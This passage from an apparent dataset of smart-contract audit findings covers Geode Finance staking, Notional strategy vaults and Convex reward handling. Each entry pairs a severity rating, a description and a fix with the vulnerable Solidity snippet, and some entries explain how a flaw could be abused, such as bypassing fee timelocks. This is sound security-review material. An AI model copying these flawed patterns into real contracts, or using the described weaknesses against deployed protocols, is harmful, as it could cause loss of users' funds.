But it is intended to be external once the withdrawal process is in place.чMake sure that you can only blame the operator of an active validator.чч```\\n/\\*\\*\\n \\* @notice allows improsening an Operator if the validator have not been exited until expectedExit\\n \\* @dev anyone can call this function\\n \\* @dev if operator has given enough allowence, they can rotate the validators to avoid being prisoned\\n \\*/\\nfunction blameOperator(\\n StakePool storage self,\\n DataStoreUtils.DataStore storage DATASTORE,\\n bytes calldata pk\\n) external {\\n if (\\n block.timestamp > self.TELESCOPE.\\_validators[pk].expectedExit &&\\n self.TELESCOPE.\\_validators[pk].state != 3\\n ) {\\n OracleUtils.imprison(\\n DATASTORE,\\n self.TELESCOPE.\\_validators[pk].operatorId\\n );\\n }\\n}\\n```\\n -Latency timelocks on certain functions can be bypassedчmediumчThe functions `switchMaintainerFee()` and `switchWithdrawalBoost()` add a latency of typically three days to the current timestamp at which the new value is meant to be valid. However, they don't limit the number of times this value can be changed within the latency period. This allows a malicious maintainer to set their desired value twice and effectively make the change immediately. Let's take the first function as an example. The first call to it sets a value as the `newFee`, moving the old value to `priorFee`, which is effectively the fee in use until the time lock is up. 
A follow-up call to the function with the same value as a parameter would mean the “new” value overwrites the old `priorFee` while remaining in the queue for the switch.\\n```\\nfunction switchMaintainerFee(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id,\\n uint256 newFee\\n) external {\\n DATASTORE.writeUintForId(\\n id,\\n \"priorFee\",\\n DATASTORE.readUintForId(id, \"fee\")\\n );\\n DATASTORE.writeUintForId(\\n id,\\n \"feeSwitch\",\\n block.timestamp + FEE\\_SWITCH\\_LATENCY\\n );\\n DATASTORE.writeUintForId(id, \"fee\", newFee);\\n\\n emit MaintainerFeeSwitched(\\n id,\\n newFee,\\n block.timestamp + FEE\\_SWITCH\\_LATENCY\\n );\\n}\\n```\\n\\n```\\nfunction getMaintainerFee(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id\\n) internal view returns (uint256 fee) {\\n if (DATASTORE.readUintForId(id, \"feeSwitch\") > block.timestamp) {\\n return DATASTORE.readUintForId(id, \"priorFee\");\\n }\\n return DATASTORE.readUintForId(id, \"fee\");\\n}\\n```\\nчAdd a check to make sure only one value can be set between time lock periods.чч```\\nfunction switchMaintainerFee(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id,\\n uint256 newFee\\n) external {\\n DATASTORE.writeUintForId(\\n id,\\n \"priorFee\",\\n DATASTORE.readUintForId(id, \"fee\")\\n );\\n DATASTORE.writeUintForId(\\n id,\\n \"feeSwitch\",\\n block.timestamp + FEE\\_SWITCH\\_LATENCY\\n );\\n DATASTORE.writeUintForId(id, \"fee\", newFee);\\n\\n emit MaintainerFeeSwitched(\\n id,\\n newFee,\\n block.timestamp + FEE\\_SWITCH\\_LATENCY\\n );\\n}\\n```\\n -MiniGovernance's senate has almost unlimited validityчmediumчA new senate for the MiniGovernance contract is set in the following line:\\n```\\nGEM.\\_setSenate(newSenate, block.timestamp + SENATE\\_VALIDITY);\\n```\\n\\nThe validity period argument should not include `block.timestamp`, because it is going to be added a bit later in the code:\\n```\\nself.SENATE\\_EXPIRY = block.timestamp + 
\\_senatePeriod;\\n```\\n\\nSo currently, every senate of MiniGovernance will have much longer validity than it is supposed to.чPass onlySENATE_VALIDITY in the `_refreshSenate` function.чч```\\nGEM.\\_setSenate(newSenate, block.timestamp + SENATE\\_VALIDITY);\\n```\\n -Proposed validators not accounted for in the monopoly check.чmediumчThe Geode team introduced a check that makes sure that node operators do not initiate more validators than a threshold called `MONOPOLY_THRESHOLD` allows. It is used on call to `proposeStake(...)` which the operator would call in order to propose new validators. It is worth mentioning that onboarding new validator nodes requires 2 steps: a proposal from the node operator and approval from the planet maintainer. After the first step validators get a status of `proposed`. After the second step validators get the status of `active` and all eth accounting is done. The issue we found is that the `proposed` validators step performs the monopoly check but does not account for previously `proposed` but not `active` validators.\\nAssume that `MONOPOLY_THRESHOLD` is set to 5. The node operator could propose 4 new validators and pass the monopoly check and label those validators as `proposed`. The node operator could then suggest 4 more validators in a separate transaction and since the monopoly check does not check for the `proposed` validators, that would pass as well. 
Then in `beaconStake` or the step of maintainer approval, there is no monopoly check at all, so 8 validators could be activated at once.\\n```\\nrequire(\\n (DATASTORE.readUintForId(operatorId, \"totalActiveValidators\") +\\n pubkeys.length) <= self.TELESCOPE.MONOPOLY\\_THRESHOLD,\\n \"StakeUtils: IceBear does NOT like monopolies\"\\n);\\n```\\nчInclude the `(DATASTORE.readUintForId(poolId,DataStoreUtils.getKey(operatorId, \"proposedValidators\"))` into the require statement, just like in the check for the node operator allowance check.\\n```\\nrequire(\\n (DATASTORE.readUintForId(\\n poolId,\\n DataStoreUtils.getKey(operatorId, \"proposedValidators\")\\n ) +\\n DATASTORE.readUintForId(\\n poolId,\\n DataStoreUtils.getKey(operatorId, \"activeValidators\")\\n ) +\\n pubkeys.length) <=\\n operatorAllowance(DATASTORE, poolId, operatorId),\\n \"StakeUtils: NOT enough allowance\"\\n);\\n```\\nчч```\\nrequire(\\n (DATASTORE.readUintForId(operatorId, \"totalActiveValidators\") +\\n pubkeys.length) <= self.TELESCOPE.MONOPOLY\\_THRESHOLD,\\n \"StakeUtils: IceBear does NOT like monopolies\"\\n);\\n```\\n -Comparison operator used instead of assignment operatorчmediumч```\\nself.\\_validators[\\_pk].state == 2;\\n```\\n\\n```\\nself.\\_validators[\\_pk].state == 3;\\n```\\nчReplace `==` with `=`.чч```\\nself.\\_validators[\\_pk].state == 2;\\n```\\n -initiator modifier will not work in the context of one transactionчlowчEach planet, comet or operator must be initialized after the onboarding proposal is approved. 
In order to make sure that these entities are not initialized more than once `initiateOperator`, `initiateComet` and `initiatePlanet` have the `initiator` modifier.\\n```\\nfunction initiatePlanet(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256[3] memory uintSpecs,\\n address[5] memory addressSpecs,\\n string[2] calldata interfaceSpecs\\n)\\n external\\n initiator(DATASTORE, 5, uintSpecs[0], addressSpecs[1])\\n returns (\\n address miniGovernance,\\n address gInterface,\\n address withdrawalPool\\n )\\n```\\n\\n```\\nfunction initiateComet(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id,\\n uint256 fee,\\n address maintainer\\n) external initiator(DATASTORE, 6, id, maintainer) {\\n```\\n\\n```\\nfunction initiateOperator(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 id,\\n uint256 fee,\\n address maintainer\\n) external initiator(DATASTORE, 4, id, maintainer) {\\n```\\n\\nInside that modifier, we check that the `initiated` flag is 0 and if so we proceed to initialization. We later update it to the current timestamp.\\n```\\nmodifier initiator(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256 \\_TYPE,\\n uint256 \\_id,\\n address \\_maintainer\\n) {\\n require(\\n msg.sender == DATASTORE.readAddressForId(\\_id, \"CONTROLLER\"),\\n \"MaintainerUtils: sender NOT CONTROLLER\"\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, \"TYPE\") == \\_TYPE,\\n \"MaintainerUtils: id NOT correct TYPE\"\\n );\\n require(\\n DATASTORE.readUintForId(\\_id, \"initiated\") == 0,\\n \"MaintainerUtils: already initiated\"\\n );\\n\\n DATASTORE.writeAddressForId(\\_id, \"maintainer\", \\_maintainer);\\n\\n \\_;\\n\\n DATASTORE.writeUintForId(\\_id, \"initiated\", block.timestamp);\\n\\n emit IdInitiated(\\_id, \\_TYPE);\\n}\\n```\\n\\nUnfortunately, this does not follow the checks-effects-interractions pattern. 
If one for example would call `initiatePlanet` again from the body of the modifier, this check will still pass making it susceptible to a reentrancy attack. While we could not find a way to exploit this in the current engagement, given that system is designed to be upgradable this could become a risk in the future. For example, if during the initialization of the planet the maintainer will be allowed to pass a custom interface that could potentially allow reentering.чBring the line that updated the `initiated` flag to the current timestamp before the `_;`.\\n```\\nDATASTORE.writeUintForId(\\_id, \"initiated\", block.timestamp);\\n```\\nчч```\\nfunction initiatePlanet(\\n DataStoreUtils.DataStore storage DATASTORE,\\n uint256[3] memory uintSpecs,\\n address[5] memory addressSpecs,\\n string[2] calldata interfaceSpecs\\n)\\n external\\n initiator(DATASTORE, 5, uintSpecs[0], addressSpecs[1])\\n returns (\\n address miniGovernance,\\n address gInterface,\\n address withdrawalPool\\n )\\n```\\n -Incorrect accounting for the burned gEthчlowчGeode Portal records the amount of minted and burned gETH on any given day during the active period of the oracle. One case where some gETH is burned is when the users redeem gETH for ETH. 
In the burn function we burn the spentGeth - `gEthDonation` but in the accounting code we do not account for `gEthDonation` so the code records more assets burned than was really burned.\\n```\\nDATASTORE.subUintForId(poolId, \"surplus\", spentSurplus);\\nself.gETH.burn(address(this), poolId, spentGeth - gEthDonation);\\n\\nif (self.TELESCOPE.\\_isOracleActive()) {\\n bytes32 dailyBufferKey = DataStoreUtils.getKey(\\n block.timestamp - (block.timestamp % OracleUtils.ORACLE\\_PERIOD),\\n \"burnBuffer\"\\n );\\n DATASTORE.addUintForId(poolId, dailyBufferKey, spentGeth);\\n}\\n```\\nчRecord the `spentGeth` - gEthDonation instead of just `spentGeth` in the burn buffer.\\n```\\nDATASTORE.addUintForId(poolId, dailyBufferKey, spentGeth);\\n```\\nчч```\\nDATASTORE.subUintForId(poolId, \"surplus\", spentSurplus);\\nself.gETH.burn(address(this), poolId, spentGeth - gEthDonation);\\n\\nif (self.TELESCOPE.\\_isOracleActive()) {\\n bytes32 dailyBufferKey = DataStoreUtils.getKey(\\n block.timestamp - (block.timestamp % OracleUtils.ORACLE\\_PERIOD),\\n \"burnBuffer\"\\n );\\n DATASTORE.addUintForId(poolId, dailyBufferKey, spentGeth);\\n}\\n```\\n -Boost calculation on fetchUnstake should not be using the cumBalance when it is larger than debt.чlowчThe Geode team implemented the 2-step withdrawal mechanism for the staked ETH. First, node operators signal their intent to withdraw the stake, and then the oracle will trigger all of the accounting of rewards, balances, and buybacks if necessary. Buybacks are what we are interested in at this time. Buybacks are performed by checking if the derivative asset is off peg in the Dynamic Withdrawal Pool contract. Once the debt is larger than some ignorable threshold an arbitrage buyback will be executed. A portion of the arbitrage profit will go to the node operator. The issue here is that when simulating the arbitrage swap in the `calculateSwap` call we use the cumulative un-stake balance rather than ETH debt preset in the DWP. 
In the case where the withdrawal cumulative balance is higher than the debt node operator will receive a higher reward than intended.\\n```\\nuint256 arb = withdrawalPoolById(DATASTORE, poolId)\\n .calculateSwap(0, 1, cumBal);\\n```\\nчUse the `debt` amount of ETH in the boost reward calculation when the cumulative balance is larger than the `debt`.чч```\\nuint256 arb = withdrawalPoolById(DATASTORE, poolId)\\n .calculateSwap(0, 1, cumBal);\\n```\\n -DataStore struct not having the _gap for upgrades.чlowч```\\nDataStoreUtils.DataStore private DATASTORE;\\nGeodeUtils.Universe private GEODE;\\nStakeUtils.StakePool private STAKEPOOL;\\n```\\n\\nIt is worth mentioning that Geode contracts are meant to support the upgradability pattern. Given that information, one should be careful not to overwrite the storage variables by reordering the old ones or adding the new once not at the end of the list of variables when upgrading. The issue comes with the fact that structs seem to give a false sense of security making it feel like they are an isolated set of storage variables that will not override anything else. In reality, struts are just tuples that are expanded in storage sequentially just like all the other storage variables. For that reason, if you have two struct storage variables listed back to back like in the code above, you either need to make sure not to change the order or the number of variables in the structs other than the last one between upgrades or you need to add a `uint256[N] _gap` array of fixed size to reserve some storage slots for the future at the end of each struct. The Geode Finance team is missing the gap in the `DataStrore` struct making it non-upgradable.\\n```\\nstruct DataStore {\\n mapping(uint256 => uint256[]) allIdsByType;\\n mapping(bytes32 => uint256) uintData;\\n mapping(bytes32 => bytes) bytesData;\\n mapping(bytes32 => address) addressData;\\n}\\n```\\nчWe suggest that gap is used in DataStore as well. 
Since it was used for all the other structs we consider it just a typo.чч```\\nDataStoreUtils.DataStore private DATASTORE;\\nGeodeUtils.Universe private GEODE;\\nStakeUtils.StakePool private STAKEPOOL;\\n```\\n -Handle division by 0чmediumчThere are a few places in the code where division by zero may occur but isn't handled.\\nIf the vault settles at exactly 0 value with 0 remaining strategy token value, there may be an unhandled division by zero trying to divide claims on the settled assets:\\n```\\nint256 settledVaultValue = settlementRate.convertToUnderlying(residualAssetCashBalance)\\n .add(totalStrategyTokenValueAtSettlement);\\n\\n// If the vault is insolvent (meaning residualAssetCashBalance < 0), it is necessarily\\n// true that totalStrategyTokens == 0 (meaning all tokens were sold in an attempt to\\n// repay the debt). That means settledVaultValue == residualAssetCashBalance, strategyTokenClaim == 0\\n// and assetCashClaim == totalAccountValue. Accounts that are still solvent will be paid from the\\n// reserve, accounts that are insolvent will have a totalAccountValue == 0.\\nstrategyTokenClaim = totalAccountValue.mul(vaultState.totalStrategyTokens.toInt())\\n .div(settledVaultValue).toUint();\\n\\nassetCashClaim = totalAccountValue.mul(residualAssetCashBalance)\\n .div(settledVaultValue);\\n```\\n\\nIf a vault account is entirely insolvent and its `vaultShareValue` is zero, there will be an unhandled division by zero during liquidation:\\n```\\nuint256 vaultSharesToLiquidator;\\n{\\n vaultSharesToLiquidator = vaultAccount.tempCashBalance.toUint()\\n .mul(vaultConfig.liquidationRate.toUint())\\n .mul(vaultAccount.vaultShares)\\n .div(vaultShareValue.toUint())\\n .div(uint256(Constants.RATE\\_PRECISION));\\n}\\n```\\n\\nIf a vault account's secondary debt is being repaid when there is none, there will be an unhandled division by zero:\\n```\\nVaultSecondaryBorrowStorage storage balance =\\n 
LibStorage.getVaultSecondaryBorrow()[vaultConfig.vault][maturity][currencyId];\\nuint256 totalfCashBorrowed = balance.totalfCashBorrowed;\\nuint256 totalAccountDebtShares = balance.totalAccountDebtShares;\\n\\nfCashToLend = debtSharesToRepay.mul(totalfCashBorrowed).div(totalAccountDebtShares).toInt();\\n```\\n\\nWhile these cases may be unlikely today, this code could be reutilized in other circumstances later that could cause reverts and even disrupt operations more frequently.чHandle the cases where the denominator could be zero appropriately.чч```\\nint256 settledVaultValue = settlementRate.convertToUnderlying(residualAssetCashBalance)\\n .add(totalStrategyTokenValueAtSettlement);\\n\\n// If the vault is insolvent (meaning residualAssetCashBalance < 0), it is necessarily\\n// true that totalStrategyTokens == 0 (meaning all tokens were sold in an attempt to\\n// repay the debt). That means settledVaultValue == residualAssetCashBalance, strategyTokenClaim == 0\\n// and assetCashClaim == totalAccountValue. Accounts that are still solvent will be paid from the\\n// reserve, accounts that are insolvent will have a totalAccountValue == 0.\\nstrategyTokenClaim = totalAccountValue.mul(vaultState.totalStrategyTokens.toInt())\\n .div(settledVaultValue).toUint();\\n\\nassetCashClaim = totalAccountValue.mul(residualAssetCashBalance)\\n .div(settledVaultValue);\\n```\\n -Increasing a leveraged position in a vault with secondary borrow currency will revertчlowчFrom the client's specifications for the strategy vaults, we know that accounts should be able to increase their leveraged positions before maturity. This property will not hold for the vaults that require borrowing a secondary currency to enter a position. When an account opens its position in such vault for the first time, the `VaultAccountSecondaryDebtShareStorage.maturity` is set to the maturity an account has entered. 
When the account is trying to increase the debt position, an account's current maturity will be checked, and since it is not set to 0, as in the case where an account enters the vault for the first time, nor is it smaller than the new maturity passed by an account as in the case of a rollover, the code will revert.\\n```\\nif (accountMaturity != 0) {\\n // Cannot roll to a shorter term maturity\\n require(accountMaturity < maturity);\\n```\\nчIn order to fix this issue, we recommend that `<` is replaced with `<=` so that an account can enter the vault maturity the account is already in as well as future ones.чч```\\nif (accountMaturity != 0) {\\n // Cannot roll to a shorter term maturity\\n require(accountMaturity < maturity);\\n```\\n -Secondary Currency debt is not managed by the Notional ControllerчlowчSome of the Notional Strategy Vaults may allow for secondary currencies to be borrowed as part of the same strategy. For example, a strategy may allow for USDC to be its primary borrow currency as well as have ETH as its secondary borrow currency.\\nIn order to enter the vault, a user would have to deposit `depositAmountExternal` of the primary borrow currency when calling `VaultAccountAction.enterVault()`. This would allow the user to borrow with leverage, as long as the `vaultConfig.checkCollateralRatio()` check on that account succeeds, which is based on the initial deposit and borrow currency amounts. This collateral ratio check is then performed throughout that user account's lifecycle in that vault, such as when they try to roll their maturity, or when liquidators try to perform collateral checks to ensure there is no bad debt.\\nHowever, in the event that the vault has a secondary borrow currency as well, that additional secondary debt is not calculated as part of the `checkCollateralRatio()` check. 
The only debt that is being considered is the `vaultAccount.fCash` that corresponds to the primary borrow currency debt:\\n```\\nfunction checkCollateralRatio(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount\\n) internal view {\\n (int256 collateralRatio, /\\* \\*/) = calculateCollateralRatio(\\n vaultConfig, vaultState, vaultAccount.account, vaultAccount.vaultShares, vaultAccount.fCash\\n```\\n\\n```\\nfunction calculateCollateralRatio(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n address account,\\n uint256 vaultShares,\\n int256 fCash\\n) internal view returns (int256 collateralRatio, int256 vaultShareValue) {\\n vaultShareValue = vaultState.getCashValueOfShare(vaultConfig, account, vaultShares);\\n\\n // We do not discount fCash to present value so that we do not introduce interest\\n // rate risk in this calculation. The economic benefit of discounting will be very\\n // minor relative to the added complexity of accounting for interest rate risk.\\n\\n // Convert fCash to a positive amount of asset cash\\n int256 debtOutstanding = vaultConfig.assetRate.convertFromUnderlying(fCash.neg());\\n```\\n\\nWhereas the value of strategy tokens that belong to that user account are being calculated by calling `IStrategyVault(vault).convertStrategyToUnderlying()` on the associated strategy vault:\\n```\\nfunction getCashValueOfShare(\\n VaultState memory vaultState,\\n VaultConfig memory vaultConfig,\\n address account,\\n uint256 vaultShares\\n) internal view returns (int256 assetCashValue) {\\n if (vaultShares == 0) return 0;\\n (uint256 assetCash, uint256 strategyTokens) = getPoolShare(vaultState, vaultShares);\\n int256 underlyingInternalStrategyTokenValue = \\_getStrategyTokenValueUnderlyingInternal(\\n vaultConfig.borrowCurrencyId, vaultConfig.vault, account, strategyTokens, vaultState.maturity\\n );\\n```\\n\\n```\\nfunction \\_getStrategyTokenValueUnderlyingInternal(\\n uint16 
currencyId,\\n address vault,\\n address account,\\n uint256 strategyTokens,\\n uint256 maturity\\n) private view returns (int256) {\\n Token memory token = TokenHandler.getUnderlyingToken(currencyId);\\n // This will be true if the the token is \"NonMintable\" meaning that it does not have\\n // an underlying token, only an asset token\\n if (token.decimals == 0) token = TokenHandler.getAssetToken(currencyId);\\n\\n return token.convertToInternal(\\n IStrategyVault(vault).convertStrategyToUnderlying(account, strategyTokens, maturity)\\n );\\n}\\n```\\n\\nFrom conversations with the Notional team, it is assumed that this call returns the strategy token value subtracted against the secondary currencies debt, as is the case in the `Balancer2TokenVault` for example. In other words, when collateral ratio checks are performed, those strategy vaults that utilize secondary currency borrows would need to calculate the value of strategy tokens already accounting for any secondary debt. However, this is a dependency for a critical piece of the Notional controller's strategy vaults collateral checks.\\nTherefore, even though the strategy vaults' code and logic would be vetted before their whitelisting into the Notional system, they would still remain an external dependency with relatively arbitrary code responsible for the liquidation infrastructure that could lead to bad debt or incorrect liquidations if the vaults give inaccurate information, and thus potential loss of funds.чSpecific strategy vault implementations using secondary borrows were not in scope of this audit. 
However, since the core Notional Vault system was, and it includes secondary borrow currency functionality, from the point of view of the larger Notional system it is recommended to include secondary debt checks within the Notional controller contract to reduce external dependency on the strategy vaults' logic.чч```\\nfunction checkCollateralRatio(\\n VaultConfig memory vaultConfig,\\n VaultState memory vaultState,\\n VaultAccount memory vaultAccount\\n) internal view {\\n (int256 collateralRatio, /\\* \\*/) = calculateCollateralRatio(\\n vaultConfig, vaultState, vaultAccount.account, vaultAccount.vaultShares, vaultAccount.fCash\\n```\\n -Vaults are unable to borrow single secondary currencyчlowчAs was previously mentioned some strategies `require` borrowing one or two secondary currencies. All secondary currencies have to be whitelisted in the `VaultConfig.secondaryBorrowCurrencies`. Borrow operation on secondary currencies is performed in the `borrowSecondaryCurrencyToVault(...)` function. Due to a `require` statement in that function, vaults will only be able to borrow secondary currencies if both of the currencies are whitelisted in `VaultConfig.secondaryBorrowCurrencies`. Considering that many strategies will have just one secondary currency, this will prevent those strategies from borrowing any secondary assets.\\n```\\nrequire(currencies[0] != 0 && currencies[1] != 0);\\n```\\nчWe suggest that the `&&` operator is replaced by the `||` operator. 
Ideally, an additional check will be performed that will ensure that values in argument arrays `fCashToBorrow`, `maxBorrowRate`, and `minRollLendRate` are passed under the same index as the whitelisted currencies in `VaultConfig.secondaryBorrowCurrencies`.\\n```\\nfunction borrowSecondaryCurrencyToVault(\\n address account,\\n uint256 maturity,\\n uint256[2] calldata fCashToBorrow,\\n uint32[2] calldata maxBorrowRate,\\n uint32[2] calldata minRollLendRate\\n) external override returns (uint256[2] memory underlyingTokensTransferred) {\\n```\\nчч```\\nrequire(currencies[0] != 0 && currencies[1] != 0);\\n```\\n -An account roll may be impossible if the vault is already at the maximum borrow capacity.чlowчOne of the actions allowed in Notional Strategy Vaults is to roll an account's maturity to a later one by borrowing from a later maturity and repaying that into the debt of the earlier maturity.\\nHowever, this could cause an issue if the vault is at maximum capacity at the time of the roll. When an account performs this type of roll, the new borrow would have to be more than the existing debt simply because it has to at least cover the existing debt and pay for the borrow fees that get added on every new borrow. 
Since the whole vault was already at max borrow capacity before with the old, smaller borrow, this process would revert at the end after the new borrow as well once the process gets to `VaultAccount.updateAccountfCash` and VaultConfiguration.updateUsedBorrowCapacity:\\n```\\nfunction updateUsedBorrowCapacity(\\n address vault,\\n uint16 currencyId,\\n int256 netfCash\\n) internal returns (int256 totalUsedBorrowCapacity) {\\n VaultBorrowCapacityStorage storage cap = LibStorage.getVaultBorrowCapacity()[vault][currencyId];\\n\\n // Update the total used borrow capacity, when borrowing this number will increase (netfCash < 0),\\n // when lending this number will decrease (netfCash > 0).\\n totalUsedBorrowCapacity = int256(uint256(cap.totalUsedBorrowCapacity)).sub(netfCash);\\n if (netfCash < 0) {\\n // Always allow lending to reduce the total used borrow capacity to satisfy the case when the max borrow\\n // capacity has been reduced by governance below the totalUsedBorrowCapacity. When borrowing, it cannot\\n // go past the limit.\\n require(totalUsedBorrowCapacity <= int256(uint256(cap.maxBorrowCapacity)), \"Max Capacity\");\\n```\\n\\nThe result is that users won't be able to roll while the vault is at max capacity. However, users may exit some part of their position to reduce their borrow, thereby reducing the overall vault borrow capacity, and then could execute the roll. A bigger problem would occur if the vault configuration got updated to massively reduce the borrow capacity, which would force users to exit their position more significantly with likely a much smaller chance at being able to roll.чDocument this case so that users can realise that rolling may not always be an option. 
Perhaps consider adding ways where users can pay a small deposit, like on `enterVault`, to offset the additional difference in borrows and pay for fees so they can remain with essentially the same size position within Notional.чч```\\nfunction updateUsedBorrowCapacity(\\n address vault,\\n uint16 currencyId,\\n int256 netfCash\\n) internal returns (int256 totalUsedBorrowCapacity) {\\n VaultBorrowCapacityStorage storage cap = LibStorage.getVaultBorrowCapacity()[vault][currencyId];\\n\\n // Update the total used borrow capacity, when borrowing this number will increase (netfCash < 0),\\n // when lending this number will decrease (netfCash > 0).\\n totalUsedBorrowCapacity = int256(uint256(cap.totalUsedBorrowCapacity)).sub(netfCash);\\n if (netfCash < 0) {\\n // Always allow lending to reduce the total used borrow capacity to satisfy the case when the max borrow\\n // capacity has been reduced by governance below the totalUsedBorrowCapacity. When borrowing, it cannot\\n // go past the limit.\\n require(totalUsedBorrowCapacity <= int256(uint256(cap.maxBorrowCapacity)), \"Max Capacity\");\\n```\\n -Rollover might introduce economically impractical deposits of dust into a strategyчlowчDuring the rollover of the strategy position into a longer maturity, several things happen:\\nFunds are borrowed from the longer maturity to pay off the debt and fees of the current maturity.\\nStrategy tokens that are associated with the current maturity are moved to the new maturity.\\nAny additional funds provided by the account are deposited into the strategy into a new longer maturity.\\nIn reality, due to the AMM nature of the protocol, the funds borrowed from the new maturity could exceed the debt the account has in the current maturity, resulting in a non-zero `vaultAccount.tempCashBalance`. In that case, those funds will be deposited into the strategy. 
That would happen even if there are no external funds supplied by the account for the deposit.\\nIt is possible that the dust in the temporary account balance will not cover the gas cost of triggering a full deposit call of the strategy.\\n```\\nuint256 strategyTokensMinted = vaultConfig.deposit(\\n vaultAccount.account, vaultAccount.tempCashBalance, vaultState.maturity, additionalUnderlyingExternal, vaultData\\n);\\n```\\nчWe suggest that additional checks are introduced that would check that on rollover `vaultAccount.tempCashBalance + additionalUnderlyingExternal > 0` or larger than a certain threshold like `minAccountBorrowSize` for example.чч```\\nuint256 strategyTokensMinted = vaultConfig.deposit(\\n vaultAccount.account, vaultAccount.tempCashBalance, vaultState.maturity, additionalUnderlyingExternal, vaultData\\n);\\n```\\n -Strategy vault swaps can be frontrunчlowчSome strategy vaults utilize borrowing one currency, swapping it for another, and then using the new currency somewhere to generate yield. For example, the CrossCurrencyfCash strategy vault could borrow USDC, swap it for DAI, and then deposit that DAI back into Notional if the DAI lending interest rates are greater than USDC borrowing interest rates. However, during vault settlement the assets would need to be swapped back into the original borrow currency.\\nSince these vaults control the borrowed assets that go only into white-listed strategies, the Notional system allows users to borrow multiples of their posted collateral and claim the yield from a much larger position. As a result, these strategy vaults would likely have significant funds being borrowed and managed into these strategies.\\nHowever, as mentioned above, these strategies usually utilize a trading mechanism to swap borrowed currencies into whatever is required by the strategy, and these trades may be quite large. 
In fact, the `BaseStrategyVault` implementation contains functions that interact with Notional's trading module to assist with those swaps:\\n```\\n/// @notice Can be used to delegate call to the TradingModule's implementation in order to execute\\n/// a trade.\\nfunction \\_executeTrade(\\n uint16 dexId,\\n Trade memory trade\\n) internal returns (uint256 amountSold, uint256 amountBought) {\\n (bool success, bytes memory result) = nProxy(payable(address(TRADING\\_MODULE))).getImplementation()\\n .delegatecall(abi.encodeWithSelector(ITradingModule.executeTrade.selector, dexId, trade));\\n require(success);\\n (amountSold, amountBought) = abi.decode(result, (uint256, uint256));\\n}\\n\\n/// @notice Can be used to delegate call to the TradingModule's implementation in order to execute\\n/// a trade.\\nfunction \\_executeTradeWithDynamicSlippage(\\n uint16 dexId,\\n Trade memory trade,\\n uint32 dynamicSlippageLimit\\n) internal returns (uint256 amountSold, uint256 amountBought) {\\n (bool success, bytes memory result) = nProxy(payable(address(TRADING\\_MODULE))).getImplementation()\\n .delegatecall(abi.encodeWithSelector(\\n ITradingModule.executeTradeWithDynamicSlippage.selector,\\n dexId, trade, dynamicSlippageLimit\\n )\\n );\\n require(success);\\n (amountSold, amountBought) = abi.decode(result, (uint256, uint256));\\n}\\n```\\n\\nAlthough some strategies may manage stablecoin <-> stablecoin swaps that typically would incur low slippage, large size trades could still suffer from low on-chain liquidity and end up getting frontrun and “sandwiched” by MEV bots or other actors, thereby extracting maximum amount from the strategy vault swaps as slippage permits. This could be especially significant during vaults' settlements, that can be initiated by anyone, as lending currencies may be swapped in large batches and not do it on a per-account basis. 
For example with the CrossCurrencyfCash vault, it can only enter settlement if all strategy tokens (lending currency in this case) are gone and swapped back into the borrow currency:\\n```\\nif (vaultState.totalStrategyTokens == 0) {\\n NOTIONAL.settleVault(address(this), maturity);\\n}\\n```\\n\\nAs a result, in addition to the risk of stablecoins' getting off-peg, unfavorable market liquidity conditions and arbitrage-seeking actors could eat into the profits generated by this strategy as per the maximum allowed slippage. However, during settlement the strategy vaults don't have the luxury of waiting for the right conditions to perform the trade as the borrows need to repaid at their maturities.\\nSo, the profitability of the vaults, and therefore users, could suffer due to potential low market liquidity allowing high slippage and risks of being frontrun with the chosen strategy vaults' currencies.чEnsure that the currencies chosen to generate yield in the strategy vaults have sufficient market liquidity on exchanges allowing for low slippage swaps.чч```\\n/// @notice Can be used to delegate call to the TradingModule's implementation in order to execute\\n/// a trade.\\nfunction \\_executeTrade(\\n uint16 dexId,\\n Trade memory trade\\n) internal returns (uint256 amountSold, uint256 amountBought) {\\n (bool success, bytes memory result) = nProxy(payable(address(TRADING\\_MODULE))).getImplementation()\\n .delegatecall(abi.encodeWithSelector(ITradingModule.executeTrade.selector, dexId, trade));\\n require(success);\\n (amountSold, amountBought) = abi.decode(result, (uint256, uint256));\\n}\\n\\n/// @notice Can be used to delegate call to the TradingModule's implementation in order to execute\\n/// a trade.\\nfunction \\_executeTradeWithDynamicSlippage(\\n uint16 dexId,\\n Trade memory trade,\\n uint32 dynamicSlippageLimit\\n) internal returns (uint256 amountSold, uint256 amountBought) {\\n (bool success, bytes memory result) = 
nProxy(payable(address(TRADING\\_MODULE))).getImplementation()\\n .delegatecall(abi.encodeWithSelector(\\n ITradingModule.executeTradeWithDynamicSlippage.selector,\\n dexId, trade, dynamicSlippageLimit\\n )\\n );\\n require(success);\\n (amountSold, amountBought) = abi.decode(result, (uint256, uint256));\\n}\\n```\\n -ConvexPositionHandler._claimRewards incorrectly calculates amount of LP tokens to unstakeчhighч`ConvexPositionHandler._claimRewards` is an internal function that harvests Convex reward tokens and takes the generated yield in ETH out of the Curve pool by calculating the difference in LP token price. To do so, it receives the current share price of the curve LP tokens and compares it to the last one stored in the contract during the last rewards claim. The difference in share price is then multiplied by the LP token balance to get the ETH yield via the `yieldEarned` variable:\\n```\\nuint256 currentSharePrice = ethStEthPool.get\\_virtual\\_price();\\nif (currentSharePrice > prevSharePrice) {\\n // claim any gain on lp token yields\\n uint256 contractLpTokenBalance = lpToken.balanceOf(address(this));\\n uint256 totalLpBalance = contractLpTokenBalance +\\n baseRewardPool.balanceOf(address(this));\\n uint256 yieldEarned = (currentSharePrice - prevSharePrice) \\*\\n totalLpBalance;\\n```\\n\\nHowever, to receive this ETH yield, LP tokens need to be unstaked from the Convex pool and then converted via the Curve pool. To do this, the contract introduces lpTokenEarned:\\n```\\nuint256 lpTokenEarned = yieldEarned / NORMALIZATION\\_FACTOR; // 18 decimal from virtual price\\n```\\n\\nThis calculation is incorrect. 
